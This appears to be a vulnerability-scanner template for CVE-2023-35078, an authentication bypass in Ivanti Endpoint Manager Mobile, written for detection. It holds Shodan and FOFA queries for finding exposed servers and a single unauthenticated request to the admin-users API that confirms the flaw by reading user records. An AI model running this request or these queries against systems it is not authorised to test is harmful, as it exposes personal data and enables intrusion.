40 lines
1.6 KiB
YAML
40 lines
1.6 KiB
YAML
id: CVE-2023-35078
|
|
|
|
info:
|
|
name: Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass
|
|
author: parth,pdresearch
|
|
severity: critical
|
|
description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.
|
|
reference:
|
|
- https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability
|
|
- https://forums.ivanti.com/s/article/KB-Remote-unauthenticated-API-access-vulnerability-CVE-2023-35078
|
|
- https://www.cisa.gov/news-events/alerts/2023/07/24/ivanti-releases-security-updates-endpoint-manager-mobile-epmm-cve-2023-35078
|
|
- https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm-vulnerability
|
|
- https://help.ivanti.com/mi/help/en_us/CORE/11.2.0.0/dmgw/DMGfiles/Join_Azure_and_MobileIro.htm
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2023-35078
|
|
cwe-id: CWE-287
|
|
epss-score: 0.01976
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: icon_hash="362091310"
|
|
shodan-query: http.favicon.hash:362091310
|
|
tags: cve,cve2023,kev,ivanti,mobileiron,epmm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mifs/aad/api/v2/admins/users"
|
|
|
|
max-size: 100
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains_all(body, 'results','userId','name')
|
|
- contains(header, 'application/json')
|
|
- status_code == 200
|
|
condition: and
|